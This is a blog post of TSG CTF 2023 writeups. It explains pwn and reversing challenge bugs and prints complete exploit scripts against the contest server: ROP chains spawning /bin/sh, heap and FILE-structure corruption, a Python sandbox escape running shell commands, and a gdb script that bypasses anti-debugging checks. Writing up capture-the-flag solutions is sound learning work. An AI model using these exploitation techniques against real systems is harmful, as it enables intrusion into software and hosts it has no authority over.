CTFするぞ

CTF以外のことも書くよ

TSG CTF 2023 Writeup

I played TSG CTF 2023 in zer0pts and stood 4th place. Everyone loves TSG CTF.

Writeups from st98:

nanimokangaeteinai.hateblo.jp

[Pwn beginner-easy] converter (78 solves, 112pts)

The program converts hex string into unicode string. The goal is to leak the flag written in flag_buffer, which is followed by a buffer for the unicode byte array.

char utf32_hexstr[3][MAX_FLAG_CHARS * 8 + 1];
char utf8_bin[MAX_FLAG_CHARS * 4 + 1];
char flag_buffer[MAX_FLAG_CHARS + 1];

What we need is buffer overflow in utf8_bin. The program is writing byte array of the unicode character one by one.

            if (i % 8 == 7) {
                utf8_ptr += c32rtomb(utf8_ptr, wc, &ps);
            } else {
                wc *= 16;
            }

I started the program with GDB and randomly entered 41414141 as the hex string. It seemed that c32rtomb returned 6, which is bigger than the expected character size (=4).

So, I sent 41 until it overflows to the flag buffer.

from ptrlib import *

#sock = Process("./chall")
sock = Socket("nc 34.146.195.242 40002")

sock.sendlineafter("> ", "41414141"*22)
sock.sendlineafter("> ", "")
sock.sendlineafter("> ", "")

sock.sh()

[Pwn beginner-easy] converter2 (26 solves, 91pts)

This challenge is a fixed version of the previous challenge. The source code does not change but the library linked is changed from glibc to musl-libc.

Reading the implementation of c32rtomb in musl, it looks like that the function does not return a value larger than 4. However, it can return -1 if the function fails to decode.

Therefore, we can decrement the pointer out-of-bounds into negative direction, where utf32_hexstr is located. So, the idea is to make utf8_ptr point to near the end of utf32_hexstr[2] and write some data there. Then, the end of our hex string is overwritten by the data and the string gets longer than expected, which can cause buffer overflow.

from ptrlib import *

#sock = Process("./chall")
#sock = Process("./test")
sock = Socket("nc 34.146.195.242 40004")

block = "000f9f8d"
sock.sendlineafter("> ", "")
payload = "ffffffff"*0x16
for c in block:
    payload += f"000000{ord(c):02x}"
sock.sendlineafter("> ", payload)
sock.sendafter("> ", block*31)

sock.sh()

First blood.

[Pwn beginner-med] BABA PWN GAME (9 solves, 290pts)

I usually don't like seeing games in pwn because, in most cases, they require us to write unnecessary "programming" such as solving SAT problems or using A* to find the shortest paths. However, this task was a bit different.

The bug lies in selecting the stage name, where a buffer overflow occurs due to improper usage of strcpy.

  // *** Step 2. Load the stage ***
  printf("DIFFICULTY? (easy/hard)\n");
  int i;
  for (i = 0; i < 63; i++) {
    char c = fgetc(stdin);
    if (c == '\n') break;
    if (c == '/' || c == '~') return 1; // no path traversal
    state.stage_name[i] = c;
  }
  strcpy(&state.stage_name[i], ".y");

More precisely, we can overwrite the character 'y' into spawn_off.

struct GameState {
  // meta values
  char stage_name[64];
  unsigned short spawn_off;
  char history[HISTORY_MAX + 64];
  // stage data
  unsigned short stage[STAGE_H][STAGE_W];
  unsigned short is_push[CHR_NUM]; // you can push this object if you move into a cell with the object
  unsigned short is_stop[CHR_NUM]; // you cannot move into a cell with this object
  unsigned short is_you[CHR_NUM];  // you can controll this object with WASD keys
  unsigned short is_sink[CHR_NUM]; // all objects in a cell are destroyed when something come onto a cell with the object
  unsigned short is_open[CHR_NUM]; // when *open* and *shut* objects are in the same cell, both are destroyed
  unsigned short is_shut[CHR_NUM]; // when *open* and *shut* objects are in the same cell, both are destroyed
  unsigned short is_win[CHR_NUM];  // you will win if *you* enter a cell with the object
  unsigned char should_update[STAGE_H][STAGE_W];
} state;

This variable has the initialize position of the player. The initial player position goes outside the stage room, which allows us to move the players outside the field.

I'm lazy to write up the rest part because it's a puzzle rather than a pwnable. This time it's solvable because of the shape of the stage.

I just paste the solver script.

from ptrlib import *

def move(m):
    sock.sendlineafter("> ", m)

#sock = Process("./baba_pwn_game")
#sock = Process("./test")
sock = Socket("nc 34.146.195.242 10906")
payload  = b"hard.y"
payload += b"\x00"*(63 - len(payload))
sock.sendafter(")\n", payload)

# Set is_push[bit('S')]
# S: push
move(b"wdddddddssssssassssssaaaaas")
move(b"ddddd")

# Set is_push[bit('S')] and is_you[bit('S')]
# S: push / player
move(b"wds")

# Set is_push[bit('I')] and is_you[bit('I')]
# S: push / player, I: push / player
move(b"sddssddssssaassssssdds")
move(b"aassssssdds")

# Double push to the goal
move(b"ddswwd")

sock.sh()

[Pwn easy] sloader (39 solves, 152pts)

Wow.

#include <stdio.h>

int main(void) {
    char buf[16];
    scanf("%s", buf);
    return 0;
}

Although every security feature is enabled, it's running on a program called "sloader."

GLOG_minloglevel=3 timeout --foreground -s 9 60s stdbuf -i0 -o0 -e0 ./sloader ./chall

Attaching the program, it was obvious that this loader didn't randomize the base address. So, every address including the process and libraries is fixed.

The second program is stack canary. However, when I cause a buffer overflow using the loader, __stack_chk_fail did not work at all. It looks like this loader uses custom library and __stack_chk_fail is empty.

ggez

from ptrlib import *

#sock = Process("./start.sh")
#sock = Process(["./sloader", "./a.out"])
sock = Socket("nc 34.146.195.242 40001")

#0x1012c960
payload  = b"A"*0x28
payload += flat([
    0x10262172, # ret;
    0x10262171, # pop rdi; ret
    0x10270563, # /bin/sh
    0x1012c960, # system
], map=p64)
#input("> ")
sock.sendline(payload)

sock.sh()

First blood.

[Pwn easy-med] tinyfs (14 solves, 240pts)

The program imitates a file system, where we can store files and folders. One notable feature is the cache system in the directory, but I didn't use it.

The first bug is out-of-bound read in the folder name. The folder structure looks like the following.

struct MyFolder {
    char name[NAME_MAX + 1];
    struct MyFolder* parent;
    struct MyFile* files[CONTENT_MAX];
    struct MyFolder* folders[CONTENT_MAX];
};

Since strcpy may overflow into parent, name can be NULL-free. It means that we can leak the address set in parent.

Similarly, there is another data leak. When allocating a folder structure, it's zero-clearing the memory.

    struct MyFolder* new_folder = (struct MyFolder*)malloc(sizeof(struct MyFolder));
    memset(new_folder, 0, sizeof(struct MyFolder));
    strcpy(new_folder->name, name);

However, it's not the case when allocating a file structure.

    struct MyFile* new_file = (struct MyFile*)malloc(sizeof(struct MyFile));
    strcpy(new_file->name, name);
    *file = new_file;

This means the file contents remains uninitialized and we can leak data such as heap or libc pointer.

Let's move to the main bug. I solved it with an unintended solution. The program is calling strcpy in several places.

...
    struct MyFolder* new_folder = (struct MyFolder*)malloc(sizeof(struct MyFolder));
    memset(new_folder, 0, sizeof(struct MyFolder));
    strcpy(new_folder->name, name);
    new_folder->parent = pwd;
    *folder = new_folder;
...
    struct MyFile* new_file = (struct MyFile*)malloc(sizeof(struct MyFile));
    strcpy(new_file->name, name);
    *file = new_file;

The usable here is invalid because the size of name could be bigger than the size of filenames.

#define NAME_MAX 0x20 - 1
#define FILE_SIZE_MAX 0x100 - 1
#define PATH_MAX 0x30 - 1
#define CACHE_MAX 0x80
#define CONTENT_MAX 0x20
...
struct MyFolder {
    char name[NAME_MAX + 1];
    struct MyFolder* parent;
    struct MyFile* files[CONTENT_MAX];
    struct MyFolder* folders[CONTENT_MAX];
};
...
        char command[0x50];
        read_n(command, 0x50);

Those strcpys cause heap buffer overflows.

I was so stupid that I thought it was overflowing only one NULL byte. Therefore, I used House of Einherjar to consolidate chunk backwardly.

Once we can corrupt the heap, it's easy to create a fake folder which has a pointer to a fake file. This gives us AAR/AAW primitives.

from ptrlib import *

def mkdir(name):
    sock.sendlineafter("$ ", "mkdir " + name)
def touch(name):
    if isinstance(name, bytes):
        sock.sendlineafter("$ ", b"touch " + name)
    else:
        sock.sendlineafter("$ ", "touch " + name)
def cd(name):
    sock.sendlineafter("$ ", "cd " + name)
def rm(name):
    sock.sendlineafter("$ ", "rm " + name)
def ls():
    sock.sendlineafter("$ ", "ls")
def cat(name):
    sock.sendlineafter("$ ", "cat " + name)
def mod(name, data):
    if isinstance(name, bytes):
        sock.sendlineafter("$ ", b"mod " + name)
    else:
        sock.sendlineafter("$ ", "mod " + name)
    sock.sendlineafter("Write Here > ", data)
def exit():
    sock.sendlineafter("$ ", "exit")

"""
#libc = ELF("/usr/lib/x86_64-linux-gnu/libc.so.6")
#sock = Process("./chall")
libc = ELF("./libc-2.37.so")
sock = Socket("localhost", 9937)
"""
libc = ELF("./libc-2.37.so")
sock = Socket("nc 34.146.195.242 31415")
#"""

# Leak heap address
mkdir("A"*0x28)
ls()
heap_base = u64(sock.recvline()[0x20:0x26]) - 0x2a0
logger.info("heap: " + hex(heap_base))

# Leak libc address
for i in range(13):
    touch(f"A{i}")
for i in range(12):
    rm(f"A{i}")
for i in range(8):
    touch(f"A{i}")
cat("A7")
libc.base = u64(sock.recvline()) - libc.main_arena() - 0x4c0

# Prepare padding
touch("XXXX")
touch("XXXXXXXX")
mkdir("A")
cd("A")
for i in range(19):
    mkdir(f"A{i}")
cd("..")
# Corrupt chunk size
touch("YYYY")
touch("ZZZZ")
touch("WWWW")
mkdir("AAAA")
rm("YYYY")
touch("Y"*0x28) # off-by-null

# Prepare prev_size
for i in range(5):
    rm("Y"*(0x28-i))
    touch("Y"*(0x27-i))
rm("Y"*0x23)
touch("Y"*0x21 + "0")
rm("Y"*0x21 + "0")
touch("Y"*0x20)

# Prepare fake chunk
payload  = b"\x00"*0xa0
payload += p64(0) + p64(0x3001) # chunk_size (Y's prev)
payload += p64(heap_base + 0x1130) + p64(heap_base + 0x1130)
payload += p64(heap_base + 0x1120) + p64(heap_base + 0x1120)
payload += p64(heap_base + 0x1120) + p64(heap_base + 0x1120)
mod("XXXX", payload)
payload  = b"\x00"*0xf0
payload += p64(0) + b"\x31" # chunk_size (Y's next)
mod("ZZZZ", payload)

# Fill tcache
for i in range(7):
    touch(f"B{i}")
    touch(f"C{i}")
    rm(f"B{i}")
    touch("B"*0x27 + f"{i}")
for i in range(7):
    rm(f"C{i}")

# Backward consolidation
rm("ZZZZ")

# Create fake directory
mkdir("neko")
payload  = p64(libc.symbol("_IO_2_1_stderr_"))
payload += p64(heap_base + 0x11c0 - 0x68)
payload += p64(libc.symbol("system"))
mod("", payload)

# Corrupt FILE
cd("neko")
fake_file = flat([
    0x3b01010101010101, u64(b"/bin;sh\0") - 0x4e8, # flags / rptr
    0, 0, # rend / rbase
    0, 1, # wbase / wptr
    0, 0, # wend / bbase
    0, 0, # bend / savebase
    0, 0, # backupbase / saveend
    0, 0, # marker / chain
], map=p64)
fake_file += p64(libc.symbol("system")) # __doallocate
fake_file += b'\x00' * (0x88 - len(fake_file))
fake_file += p64(libc.base + 0x1f8a30) # _IO_stdfile_2_lock
fake_file += b'\x00' * (0xa0 - len(fake_file))
fake_file += p64(heap_base + 0x11b8 - 0xe0) # wide_data
fake_file += b'\x00' * (0xc0 - len(fake_file))
fake_file += p64(heap_base + 0x880 + 8) # mode != 0
fake_file += b'\x00' * (0xd8 - len(fake_file))
fake_file += p64(libc.base + 0x1f3240 + 0x18 - 0x58)
fake_file += p64(heap_base + 0x880 + 0x18) # _wide_data->_wide_vtab
mod(p64(libc.symbol("_IO_2_1_stdout_") + 131), fake_file)

sock.sendline("exit")

sock.sh()

First blood.

[Pwn medium] ghost (3 solves, 428pts)

The program is written in Rust and is based on the PoC of a paper. Basically, there are 2 vector sharing a single buffer: one is std::Vec<String> and another is BrandedVec<String>.

BrandedVec has a member named max_index, which holds the largest index accessed so far.

The program imitates Twitter in which we can push tweets and pin one of them. Additionally, we can move the pinned tweet to older or newer places.

The bug occurs in move_pin_tweet, where the move takes place.

    fn move_pin_tweet(&mut self) {
        print_str("older[0] / newer[1] > ");
        let old_new = get_usize();
        print_str("size > ");
        let id = get_usize();

        if old_new == 1 {
            self.pinned = self
                .tweets
                .get_index(self.pinned + id)
                .expect("no such tweet");
        } else {
            self.pinned = self.pinned - id;
        }
        assert!(self.sanity_check());
    }

It's calculating the index in different way based on the direction of the move. Addition in BrandedIndex is defined in the following way:

impl<'id> std::ops::Sub<usize> for BrandedIndex<'id> {
    type Output = Self;

    fn sub(mut self, rhs: usize) -> Self::Output {
        self.idx -= rhs;
        self
    }
}

impl<'id> std::ops::Add<usize> for BrandedIndex<'id> {
    type Output = usize;

    fn add(self, rhs: usize) -> Self::Output {
        self.idx + rhs
    }
}

Sub returns a BrandedIndex value while Add returns a usize value. This is because we don't need to check max_index if we move the tweet to older places, where we know it's within the array size.

If an integer overflow happens, Rust throws an exception. However, in release mode, Rust does not throw an exception on integer overflows.

Therefore, if we feed a big value to the offset of the move, it may move the tweet in the opposite direction. More specifically, if we choose to move the tweet to older places and input 0xffffffff_ffffffff, it actually moves the index to newer places without checking the index. Then, BrandedIndex points to out-of-bounds.

We need to be careful, however, that sanity_check always checks if the index is outside of the capacity.

    pub fn sanity_check(&self, index: BrandedIndex<'id>) -> bool {
        index.idx < self.inner.len()
    }

So, we have to exploit it by abusing uninitialized vector elements: the leftover of pop method.

The exploit is straightforward. I leaked libc and heap addresses from freed String. The feature to modify a string allows us to modify the tcache free link. Which means we can allocate a chunk wherever we want.

I first attempted to link the freelist into _IO_2_1_stdout_. Rust does not use stdio that glibc provides on runtime but it calls _IO_cleanup on exit. Although I wanted to abuse _IO_cleanup to hijack execution flow, the program will try to free the fake chunk allocated on _IO_2_1_stdout_ before program exits, which crashes the program before reaching the exit handlers.

I changed the strategy to allocate a fake chunk on Vec<String> buffer instead of _IO_2_1_stdout_, which is a safe place to free. Then, I got full control over the vector and could achieve AAR/AAW primitives.

from ptrlib import *

def post(message):
    sock.sendlineafter("> ", "1")
    sock.sendlineafter("> ", message)
def undo():
    sock.sendlineafter("> ", "2")
def pin(index):
    sock.sendlineafter("> ", "3")
    sock.sendlineafter("> ", index)
def show():
    sock.sendlineafter("> ", "4")
def modify(message):
    sock.sendlineafter("> ", "5")
    sock.sendlineafter("> ", message)
def move(forward, distance):
    sock.sendlineafter("> ", "6")
    if forward:
        sock.sendlineafter("] > ", "1")
    else:
        sock.sendlineafter("] > ", "0")
    sock.sendlineafter("size > ", distance)

libc = ELF("./libc.so.6")
#sock = Process("./ghost")
sock = Socket("nc 34.146.195.242 40007")

# Leak heap address
post(b"AAAA")
move(False, 0xffffffffffffffff)
undo()
show()
heap_base = (u64(sock.recvline()) << 12) - 0x2000
logger.info("heap = " + hex(heap_base))

# Leak libc address
for i in range(8):
    if i == 7:
        post(b"A"*0xf8 + p64(0x201))
    else:
        post(str(i)*0x100)
for i in range(8):
    undo()
show()
libc.base = u64(sock.recvline()[:8]) - libc.main_arena() - 0x60

# Corrupt tcache
post(b"X"*0x100)
post(b"Y"*0x100)
move(False, 0xffffffffffffffff)
undo()
undo()
target = heap_base + 0x35a0
modify(p64(target ^ ((heap_base + 0x2000) >> 12)))

# Corrupt Vec<String>
post(b"X"*0x100)
payload  = b"\x00"*0xe0
payload += p64(heap_base + 0x2f68 - 0x68)
payload += p64(libc.symbol("system"))
payload += b"\x00"*(0x100 - len(payload))
post(payload)

fake_vec  = b"A"*8 + p64(0x191)
fake_vec += p64(0x017) + p64(heap_base + 0x0ba0) + p64(0x017)
fake_vec += p64(0x101) + p64(heap_base + 0x2d70) + p64(0x101)
fake_vec += p64(0x101) + p64(libc.symbol("_IO_2_1_stderr_")) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2c60) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2f90) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3170) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3280) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3390) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x34a0) + p64(0x101)
fake_vec += b"A" * (0x100 - len(fake_vec))
post(fake_vec)

# Corrupt FILE
fake_file = flat([
    0x3b01010101010101, u64(b"/bin;sh\0") - 0x4e8, # flags / rptr
    0, 0, # rend / rbase
    0, 1, # wbase / wptr
    0, 0, # wend / bbase
    0, 0, # bend / savebase
    0, 0, # backupbase / saveend
    0, 0, # marker / chain
], map=p64)
fake_file += p64(libc.symbol("system")) # __doallocate
fake_file += b'\x00' * (0x88 - len(fake_file))
fake_file += p64(libc.base + 0x21ba70) # _IO_stdfile_2_lock
fake_file += b'\x00' * (0xa0 - len(fake_file))
fake_file += p64(heap_base + 0x2f60 - 0xe0) # wide_data
fake_file += b'\x00' * (0xc0 - len(fake_file))
fake_file += p64(heap_base + 0x880 + 8) # mode != 0
fake_file += b'\x00' * (0xd8 - len(fake_file))
fake_file += p64(libc.base + 0x2160c0 + 0x18 - 0x58)
fake_file += p64(heap_base + 0x880 + 0x18) # _wide_data->_wide_vtab
fake_file += b"A"*(0x100 - len(fake_file))
modify(fake_file)

# Restore heap
move(False, 0xffffffffffffffff)
fake_vec  = b"A"*8 + p64(0x191)
fake_vec += p64(0x017) + p64(heap_base + 0x0ba0) + p64(0x017)
fake_vec += p64(0x101) + p64(heap_base + 0x2d70) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2e80) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2c60) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x2f90) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3170) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3280) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x3390) + p64(0x101)
fake_vec += p64(0x101) + p64(heap_base + 0x34a0) + p64(0x101)
fake_vec += b"A" * (0x100 - len(fake_vec))
modify(fake_vec)

sock.sendlineafter("> ", "7")

sock.sh()

First blood.

[Pwn hard] bypy (4 solves, 393pts)

The following code is the core of this challenge.

def main():
    global __builtins__
    print("Give me your source: ")
    src = input()
    if len(src) > NMAX:
        print("too long")
        exit(-1)

    c = b64decode(src)
    code = loads(c)
    if not validator(code):
        print("invalid code")
        exit(-1)

    dummy.__code__ = code

    print(dummy())

We can set arbitrary Python object to __code__ property of an empty function. That is, we can create an arbitrary function with any opcodes.

However, the following check ensures that the function object does not take any arguments, constants, or names.

def validator(c):
    if len(c.co_names) != 0:
        return False
    if len(c.co_consts) != 0:
        return False
    if len(c.co_cellvars) != 0:
        return False
    if len(c.co_freevars) != 0:
        return False
    if len(c.co_varnames) != 0:
        return False
    return True

A well-known fact about Python bytecode is that some opcodes do not implement out-of-bounds checking. This allows us to pick an object from outside the stack.

I first tried to get breakpoint object and call it, but the function calls __import__ internally, which is deleted by the following code:

for key in ["eval", "exec", "__import__", "open"]:
    del __builtins__.__dict__[key]

So, I picked up exec object instead.

Seeking for a class that includes os package, I found a class named BuiltinImporter, which has a method named load_module. I could successfully load os module and call system.

Here is the final exploit:

from ptrlib import *
from base64 import b64encode
from marshal import dumps
import opcode

"""
search -p builtin_exec
search -p <found - 8>
search -p <found - 0x10>
"""

CodeType = (lambda x: x).__code__.__class__
bytecode = bytes([
    opcode.opmap['RESUME'], 0,
    opcode.opmap['EXTENDED_ARG'], 0xff,
    opcode.opmap['EXTENDED_ARG'], 0xea,
    opcode.opmap['EXTENDED_ARG'], 0x58,
    opcode.opmap['LOAD_CONST'], 0xc3,
    opcode.opmap['EXTENDED_ARG'], 0xff,
    opcode.opmap['EXTENDED_ARG'], 0xe8,
    opcode.opmap['EXTENDED_ARG'], 0x99,
    opcode.opmap['LOAD_CONST'], 0xef,
    opcode.opmap['CALL'], 0,
    opcode.opmap['POP_TOP'], 0,
    opcode.opmap['RETURN_VALUE'], 0,
])
#code = "breakpoint()"
code = "list(filter(lambda m: m.__name__ == 'BuiltinImporter', ().__class__.__base__.__subclasses__()))[0]().load_module('os').system('cat flag*')"
#code = "().__class__.__base__.__subclasses__()[225]()._module.sys.modules['os'].system('cat /flag*')"
exp = CodeType(0,0,0,0,0,0,bytecode,(),(),(),code,"","",0,code.encode(),b"")
payload = dumps(exp)

"""
#sock = Process(["docker", "run", "--rm", "-i", "bypy", "/bin/bash"])
#sock.sendline("./start.sh")
sock = Socket("localhost", 40003)
"""
sock = Socket("nc 34.146.195.242 40003")
#"""
sock.sendlineafter("source: ", b64encode(payload))
sock.sh()

[Reversing beginner-easy] beginners_rev_2023

This is a straightforward reversing challenge in which the program encrypts our input and compares it with an encrypted flag. The algorithm is composed of 3 parts:

  1. Shift and xor encoder
  2. Some encryption
  3. Shift and xor encoder

The encoder is simple enough.

Shift and xor encoder

For each 8-byte block of the input, it shifts the value by 12-bit and xor it with the original value. This operation is reversible by properly restoring the original state from the highest bits. The same encoding algorithm is used after the encryption, which we can decode in the same way.

The most important code is the encryption. Since the decompiled code of the encryption was hardly readable, I reverse engineered the initialization of the encryption context. While the code for initialization was also complicated, I realized that it's initializing an array of 0x100 elements.

Additionally, the initialization function takes a key and its size. The key is 2023TTSSGG2023!, which is 15 bytes. It implies that the encryption is not a block cipher, but likely a stream cipher.

I run the program with x64dbg and dumped the memory as shown below.

The "context" of encryption after initialization

I calculated S-box of RC4 with the same key, and it turned out that the values above was exactly the same as the S-box.

from Crypto.Cipher import AES
from ptrlib import *
from rc4 import RC4

rc4 = RC4(b"2023TTSSGG2023!")

def rev_shift(v):
    a = (v & 0xfff0_0000_0000_0000) >> (64 - 12)
    b = (v & 0x000f_ff00_0000_0000) >> (64 - 24)
    c = (v & 0x0000_00ff_f000_0000) >> (64 - 36)
    d = (v & 0x0000_0000_0fff_0000) >> (64 - 48)
    e = (v & 0x0000_0000_0000_fff0) >> (64 - 60)
    f = (v & 0x0000_0000_0000_000f)
    b ^= a
    c ^= b
    d ^= c
    e ^= d
    f ^= e >> 8
    o = f
    o |= e << (64 - 60)
    o |= d << (64 - 48)
    o |= c << (64 - 36)
    o |= b << (64 - 24)
    o |= a << (64 - 12)
    return o

with open("beginners-rev-2023.exe", "rb") as f:
    f.seek(0x3040)
    enc = f.read(0x200)

enc = list(map(u64, chunks(enc, 8)))
for i in range(64):
    enc[i] = rev_shift(enc[i])

enc = flat(enc, map=p64)
enc = rc4.crypt(enc)

enc = list(map(u64, chunks(enc, 8)))
for i in range(64):
    enc[i] = rev_shift(enc[i])

flag = flat(enc, map=p64)
print(flag)

[Reversing easy] T the weakest

The program is packed with a simple xor encoder. The decoded code is written to a memory file and is executed with execv system call. Reading the unpacked code, we can easily find out that it's another packed code. So, we need to automate unpacking this recursively-packed program.

XOR decoder

One thing to note is that the program checks our input character by character in each phase of the unpack. If the character is invalid, the program immediately exits and no more unpacking occurs.

The first program is checking the first byte of the flag

Fortunately, each stage checks a single character, which means that we can bruteforce it.

I thought of automating it with Qiling, but Qiling is too outdated that it cannot execute a simple executable in recent versions of the Linux for over a year. I used gdb script instead.

There are two obstacles in automating the solver.

Firstly, from the 22nd character, the program starts checking LINES and COLUMNS environment variables, which are added by GDB.

We can simply unset them to bypass the check.

gdb.execute("unset environment LINES")
gdb.execute("unset environment COLUMNS")

Secondly, from the 27nd character, it checks the return value of malloc.

This calculation checks if ASLR is enabled. Let's turn on ASLR.

gdb.execute("set disable-randomization off")

The last obstacle, from 60th character, is the ptrace check to detect debugger.

We cannot simply modify the return value of ptrace because some of them must succeed while others must fail. It looks like ptrace must be successful if jnz instruction follows, and must fail if jz instruction follows. I checked the instruction followed by the ptrace call to bypass the check.

gdb.execute("break ptrace")
gdb.execute("break kill")
...
    where = gdb.execute("i sym $rip", to_string=True)
    if "ptrace in section" in where:
        gdb.execute("finish")
        insn = gdb.execute("x/4i $rip", to_string=True)
        if "jne" not in insn:
            gdb.execute("set $rax=0")

Additionally, it tries to send signal to the parent process. Let's disable it by changing the PID.

    elif "kill in section" in where:
        gdb.execute("set $edi=12345678")

Here is the final script:

import gdb

gdb.execute("unset environment LINES")
gdb.execute("unset environment COLUMNS")
gdb.execute("set disable-randomization off")
gdb.execute("start m")
gdb.execute("break ptrace")
gdb.execute("break kill")
gdb.execute("break puts")
gdb.execute("break write")
while True:
    gdb.execute("conti")

    where = gdb.execute("i sym $rip", to_string=True)
    if "ptrace in section" in where:
        gdb.execute("finish")
        insn = gdb.execute("x/4i $rip", to_string=True)
        if "jne" not in insn:
            gdb.execute("set $rax=0")

    elif "kill in section" in where:
        gdb.execute("set $edi=12345678")

    elif "write in section" in where:
        gdb.execute("dump binary memory 102.bin $rsi $rsi+$rdx")
        print("RESULT: OK")
        break

    else:
        print("RESULT: NG")
        break

gdb.execute("quit")

総評

OCaml以外のmoratorium問好き。smallkirby問はどこ?